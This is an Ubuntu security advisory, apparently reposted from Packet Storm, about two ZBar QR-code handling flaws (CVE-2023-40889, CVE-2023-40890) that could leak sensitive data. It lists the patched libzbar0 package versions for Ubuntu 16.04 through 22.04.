    ==========================================================================Ubuntu Security Notice USN-7118-1November 21, 2024zbar vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 16.04 LTSSummary:ZBar could expose sensitive data if it opened a specially crafted fileSoftware Description:- zbar: QR code / bar code scanner and decoder (Perl bindings)Details:It was discovered that ZBar did not properly handle certain QR codes. If auser or automated system using ZBar were tricked into opening a speciallycrafted file, an attacker could possibly use this to obtain sensitiveinformation.  (CVE-2023-40889)It was discovered that ZBar did not properly handle certain QR codes. If auser or automated system using ZBar were tricked into opening a speciallycrafted file, an attacker could possibly use this to obtain sensitiveinformation. This issue only affected Ubuntu 20.04 LTS, and Ubuntu 22.04LTS. (CVE-2023-40890)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  libzbar0                        0.23.92-4ubuntu0.1~esm1                                  Available with Ubuntu ProUbuntu 20.04 LTS  libzbar0                        0.23-1.3ubuntu0.1~esm1                                  Available with Ubuntu ProUbuntu 18.04 LTS  libzbar0                        0.10+doc-10.1ubuntu0.1~esm1                                  Available with Ubuntu ProUbuntu 16.04 LTS  libzbar0                        0.10+doc-10ubuntu1+esm1                                  Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-7118-1  CVE-2023-40889, CVE-2023-40890

Source

Packet Storm